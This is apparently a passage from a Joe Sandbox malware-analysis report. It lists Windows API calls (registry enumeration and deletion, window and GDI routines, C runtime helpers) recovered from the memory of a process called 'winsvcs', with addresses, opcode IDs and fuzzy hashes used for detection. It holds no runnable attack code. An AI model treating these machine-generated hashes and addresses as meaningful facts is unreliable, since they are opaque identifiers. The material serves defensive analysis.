                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0041395D
                                                                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00413989
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Long$DestroyRedraw$CacheCurrentFlushInstructionProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3160769009-0
                                                                                                                                                                                                                          • Opcode ID: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
                                                                                                                                                                                                                          • Instruction ID: 53fdc4dda89daccb099a69e9506e87e8d6b252ccccbd8fdd27d7c1450a31b40a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cd0c253de24d0da4a258324cbea736e14a8812de488181c82210799ed2210c6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E451B5702047009BD7305F25DC48B67BBE5FF44715F048A2EF4AA822E1D7B4AE41C718
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(00136788,?,00000000,?,00135518), ref: 0041A7D0
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A7E8
                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A83B
                                                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000100,00000000,00000000,00000000,0013550C), ref: 0041A881
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A89E
                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(0043AC38), ref: 0041A8D1
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,0043AC48), ref: 0041A8E1
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A91D
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A937
                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(00136788,?), ref: 0041A956
                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0041A96C
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Close$Enum$AddressDeleteHandleModuleOpenProc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2624191705-0
                                                                                                                                                                                                                          • Opcode ID: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
                                                                                                                                                                                                                          • Instruction ID: 83ba429f44283625fc5b112b12f706557ec537738ca58ebf2211737b90b5b4cc
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a43372cc1d27a15c2e45efd9a2df907d32c4fb89c259d33e084236f886f09b6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C51A375A05348AFD7359F25DC44BEB77F8FB89354F00482AF98882250D7B48D94CBA6
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(?), ref: 00414ED1
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00414EF5
                                                                                                                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00414F05
                                                                                                                                                                                                                          • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00414F25
                                                                                                                                                                                                                          • SelectObject.GDI32(00000000,00000000), ref: 00414F37
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00414F45
                                                                                                                                                                                                                          • FillRect.USER32(?,?,00000006), ref: 00414F63
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CompatibleCreateObjectRect$BitmapClientDeleteFillSelect
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4020371940-0
                                                                                                                                                                                                                          • Opcode ID: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
                                                                                                                                                                                                                          • Instruction ID: 865ed62e204f999886674634bdac8c5fb271fad3e2ed5c8a8075e854c35c8e72
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1226587be8be15bcf8161aee864cef9789dc1afa6e9cc42e337da21b47d7f2b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C43182762043029FD3109B28EC48BA7BBB9FFD4311F04552AF94986320DB76DC91CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,004423C0,0000000C,00428325,00000000,00000000), ref: 004281FC
                                                                                                                                                                                                                          • __crt_waiting_on_module_handle.LIBCMT ref: 00428207
                                                                                                                                                                                                                            • Part of subcall function 0042AD25: Sleep.KERNEL32(000003E8,00000000,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD31
                                                                                                                                                                                                                            • Part of subcall function 0042AD25: GetModuleHandleW.KERNEL32(?,?,0042814D,KERNEL32.DLL,?,00428199), ref: 0042AD3A
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00428262
                                                                                                                                                                                                                          • InterlockedIncrement.KERNEL32(004491E8), ref: 0042826F
                                                                                                                                                                                                                          • __lock.LIBCMT ref: 00428283
                                                                                                                                                                                                                          • ___addlocaleref.LIBCMT ref: 004282A1
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: HandleModule__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                                                                                                          • String ID: KERNEL32.DLL
                                                                                                                                                                                                                          • API String ID: 4021795732-2576044830
                                                                                                                                                                                                                          • Opcode ID: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
                                                                                                                                                                                                                          • Instruction ID: 71b69992fdd27ed05a877e38898eabb59d78cf734761bb36ba796b392924f269
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 87a858832e1983b6c2b45198c842f97ef5da6d3e8eb4c482d3787c8fc6c638f7
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2211D570A41B11DFE710DF36A905B5EBBF0AF04314F50556FE89992390CB789900CB6C
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String$Free_memcpy_s
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2083054645-0
                                                                                                                                                                                                                          • Opcode ID: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
                                                                                                                                                                                                                          • Instruction ID: 1ce8d2cbe3debae867d133ec0a61dd978d441ec293a76d53af323acb72a7b2bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56663a8811120e9036bf697866b6e5e652b3cf7cb480ee4b7b3da6ff29d398f3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D221F632208601AFE7105F24EC48B5BB7B9FF44724F144C2AF98493261C779DC81CB99
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 0042B561
                                                                                                                                                                                                                          • __FindPESection.LIBCMT ref: 0042B57B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 876702719-0
                                                                                                                                                                                                                          • Opcode ID: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
                                                                                                                                                                                                                          • Instruction ID: c2943d19c9542f00f785555977c3dc5d60b80e9ec805d4403e1c04b136c06cca
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 020a3270b3e44db3070e349b28cff66a8442c1fddc848a019d4b1228e148b0af
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2C91D176B002258BCB14DF59F88076EB3B9EBC5314F95822AD815973A1E739EC01CBD8
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000,?,?,00000000,00000000,?), ref: 00418F91
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000000,80070057), ref: 00418FA9
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00418FDB
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00419018
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _memcpy_slstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2392212498-0
                                                                                                                                                                                                                          • Opcode ID: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
                                                                                                                                                                                                                          • Instruction ID: 48a8b0cc39821948161f5f9393556796c921f6ff3b7309816e02544d4b83d9d4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 69d6166470538bd476869948a087b28e718e2119ec8f685af8e8bd280e4ec471
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B3106B16042119FE730AF22EC81A777BA8EB95314F14483EF98582211EA7AEC81C759
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 00416FBC
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 00416FC7
                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00416FD3
                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 00416FE0
                                                                                                                                                                                                                          • MulDiv.KERNEL32(000009EC), ref: 00416FF0
                                                                                                                                                                                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 00417005
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CapsDevice$Release
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1035833867-0
                                                                                                                                                                                                                          • Opcode ID: e71172333e862c4ea81034a526fcd2c3146ee9f9be5889f184ede4a7547ebeca
                                                                                                                                                                                                                          • Instruction ID: 42750f41ef34324517b4a613354de802db7d77789f1efda8bfac445f8f3058b2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e71172333e862c4ea81034a526fcd2c3146ee9f9be5889f184ede4a7547ebeca
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 90318D75644700AFE7209F24CC84BABBBF9FF49701F00452DFA8A9A391D7B5A841CB25
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411A19
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00411A29
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411A4A
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00411A8E
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411A98
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,00000004,?), ref: 00411AA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3823208529-0
                                                                                                                                                                                                                          • Opcode ID: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
                                                                                                                                                                                                                          • Instruction ID: 37a676f5cb27032d0318369953a16ba400cad8c49294232363eb4eb626f908f1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07a1dbbba7aca397bf205b4bf3402bca78ea00ce08c76a63137ae00674a9b799
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A821A132301310AFD7208FA5D8C4A27BFA4FF48714B08896AEA498B211C774EC41CB75
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B340), ref: 00411F59
                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00411F69
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B340), ref: 00411F8A
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 00411FCE
                                                                                                                                                                                                                          • FlushInstructionCache.KERNEL32(00000000,?,0000000D), ref: 00411FD8
                                                                                                                                                                                                                          • SetWindowLongA.USER32(?,000000FC,?), ref: 00411FE5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalCurrentSection$CacheEnterFlushInstructionLeaveLongProcessThreadWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3823208529-0
                                                                                                                                                                                                                          • Opcode ID: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
                                                                                                                                                                                                                          • Instruction ID: 12e269af356ffb42e89dcecac3084760c7acb0868c2f02fce1b83a7edaf6f50e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bf9cfbff74908a5fb2d3181698138ae9454327fa4517f6e569a916d9ff9d2852
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA219232304310AFD7209FA5EDC4E27BBA4FB487147188A6AEE498B266C775DC41CB75
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ClientToScreen.USER32(?), ref: 00415827
                                                                                                                                                                                                                          • ClientToScreen.USER32(?,?), ref: 00415839
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00415842
                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000), ref: 00415850
                                                                                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00415860
                                                                                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00415884
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientScreen$MoveParentWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2420994850-0
                                                                                                                                                                                                                          • Opcode ID: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
                                                                                                                                                                                                                          • Instruction ID: cb2595f71ca4477885d93d82fefb541c649833f727a180719ed1214593514184
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e708bffe7d4ed9b0d7b5ab86a1ff5b96d1dd09eb2dc1c1421c56ee2158abb95a
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B214C72104202AFD701DF55DC84AABFBE8FF88350F04892DF98887260D771AC51CB65
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • __CreateFrameInfo.LIBCMT ref: 004290ED
                                                                                                                                                                                                                            • Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425802
                                                                                                                                                                                                                            • Part of subcall function 004257F4: __getptd.LIBCMT ref: 00425810
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 004290F7
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __getptd_noexit.LIBCMT ref: 0042834D
                                                                                                                                                                                                                            • Part of subcall function 0042834A: __amsg_exit.LIBCMT ref: 0042835A
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429105
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 00429113
                                                                                                                                                                                                                          • __getptd.LIBCMT ref: 0042911E
                                                                                                                                                                                                                          • _CallCatchBlock2.LIBCMT ref: 00429144
                                                                                                                                                                                                                            • Part of subcall function 00425899: __CallSettingFrame@12.LIBCMT ref: 004258E5
                                                                                                                                                                                                                            • Part of subcall function 004291EB: __getptd.LIBCMT ref: 004291FA
                                                                                                                                                                                                                            • Part of subcall function 004291EB: __getptd.LIBCMT ref: 00429208
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1602911419-0
                                                                                                                                                                                                                          • Opcode ID: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
                                                                                                                                                                                                                          • Instruction ID: b999dcdba1427255f3dfb1c667b010caa462ff74c4b9d88451a5c342c024839a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5377473d883af5e36911d90b7befaa7ab26b17d990b8ef33e783adc5ccc14be
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06111C71D00219DFDF00EFA5E945AAD7BB0FF04314F51806EF814A7251DB799A119F58
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetLayeredWindowAttributes.USER32 ref: 0041525D
                                                                                                                                                                                                                            • Part of subcall function 00423750: RtlInitializeCriticalSection.NTDLL(?), ref: 00423790
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041541E
                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0041542B
                                                                                                                                                                                                                          • GetParent.USER32(?), ref: 00415454
                                                                                                                                                                                                                          • CreateAcceleratorTableA.USER32(?,00000001), ref: 0041549D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ClientRect$AcceleratorAttributesCreateCriticalInitializeLayeredParentSectionTableWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3375822417-0
                                                                                                                                                                                                                          • Opcode ID: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
                                                                                                                                                                                                                          • Instruction ID: 6c39a8f56b411056154fd32cd0cf0432356b21fcc375bf42b615943a6af84bd3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 45d69983561acb0787a1e87c84148cf3fe4b02d4f4df03dbabd8213c6035e985
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45A10271605B01DFD750CF29C484B9ABBE0FF88714F148A6EE8899B351D7B5E881CB86
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 00418E1D
                                                                                                                                                                                                                          • lstrlenW.KERNEL32(00000000), ref: 00418E26
                                                                                                                                                                                                                          • _malloc.LIBCMT ref: 00418E87
                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000003,00000000,00000000,000000FF,?,-00000002,00000000,00000000,80070057), ref: 00418EE8
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 00418F0D
                                                                                                                                                                                                                            • Part of subcall function 0042592A: __lock.LIBCMT ref: 00425948
                                                                                                                                                                                                                            • Part of subcall function 0042592A: ___sbh_find_block.LIBCMT ref: 00425953
                                                                                                                                                                                                                            • Part of subcall function 0042592A: ___sbh_free_block.LIBCMT ref: 00425962
                                                                                                                                                                                                                            • Part of subcall function 0042592A: HeapFree.KERNEL32(00000000,00000001,00442338,0000000C,00429C99,00000000,00442590,0000000C,00429CD3,00000001,004282ED,?,0042B2C2,00000004,00442610,0000000C), ref: 00425992
                                                                                                                                                                                                                            • Part of subcall function 0042592A: GetLastError.KERNEL32(?,0042B2C2,00000004,00442610,0000000C,0042D625,00000001,004282FC,00000000,00000000,00000000,?,004282FC,00000001,00000214), ref: 004259A3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$ByteCharEnterErrorFreeHeapLastLeaveMultiWide___sbh_find_block___sbh_free_block__lock_malloclstrlen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2649083834-0
                                                                                                                                                                                                                          • Opcode ID: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
                                                                                                                                                                                                                          • Instruction ID: ef69da5e920178eb1dcc70a03244176e842f214767484c64cd14ef8785300be5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef1b224d8926f9a9dfcc6db4d708e97175d39be32bb4f1fa101077006c2e8634
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E41E271B002159BDB048EA89C80BAB77669B94314F04827EFD18DB391DE78DD4587C9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044B2D0), ref: 0041172F
                                                                                                                                                                                                                          • DestroyWindow.USER32(00000000,?,00000000,00000000,0040EE65), ref: 00411747
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044B2D0), ref: 00411784
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(0044A620), ref: 00411868
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C0000005,00000001,00000000,00000000,?,00000000,00000000,0040EE65), ref: 00411884
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$DeleteDestroyEnterExceptionLeaveRaiseWindow
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 337735902-0
                                                                                                                                                                                                                          • Opcode ID: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
                                                                                                                                                                                                                          • Instruction ID: 13516defa6da1fa1ea0f36df8edcfa91a04d8b774725dd04c741ba324b34f0a0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 247baad83138a39602c62f762ffcceb8fd03f5e9631d7b98b7941db10319a687
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 974173B5600208EFDB10AF65E884B9777A9FF04314F04816AFD198B361E778ED80CB59
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _memcpy_s.LIBCMT ref: 00410127
                                                                                                                                                                                                                          • std::_String_base::_Xlen.LIBCPMT ref: 004100D5
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: __EH_prolog3.LIBCMT ref: 00423A52
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: std::bad_exception::bad_exception.LIBCMT ref: 00423A6F
                                                                                                                                                                                                                            • Part of subcall function 00423A4B: __CxxThrowException@8.LIBCMT ref: 00423A7D
                                                                                                                                                                                                                          • std::_String_base::_Xlen.LIBCPMT ref: 0041014F
                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 0041018C
                                                                                                                                                                                                                          • _memmove_s.LIBCMT ref: 004101D7
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: String_base::_Xlen_memmove_sstd::_$Exception@8H_prolog3Throw_memcpy_sstd::bad_exception::bad_exception
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2104318304-0
                                                                                                                                                                                                                          • Opcode ID: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
                                                                                                                                                                                                                          • Instruction ID: 86bfcc1c74f1fc0be6eeef633fbe502bd8068da502ff08f6d6f7ea803161ce8a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e18c90c5c1943eaeac10e3d21b7095421590bb7663952c0f9bed313bbdb744d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A41F671604A0ABFD314DE19DA80966B3B6FB81300B50872AD42547A42D7B9FDD4C7E9
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(0044E240), ref: 00418CC0
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418D0E
                                                                                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(0044E240), ref: 00418D52
                                                                                                                                                                                                                          • RtlDeleteCriticalSection.NTDLL(0044E240), ref: 00418D65
                                                                                                                                                                                                                          • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,00418528), ref: 00418DAB
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000009.00000002.2607335595.000000000040B000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_40b000_winsvcs.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$ExceptionRaise$DeleteEnterLeave
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2896116776-0
                                                                                                                                                                                                                          • Opcode ID: 60206436312a941d5767896499db39d50c55b2d1c6d036ca9e5b6b81282be627
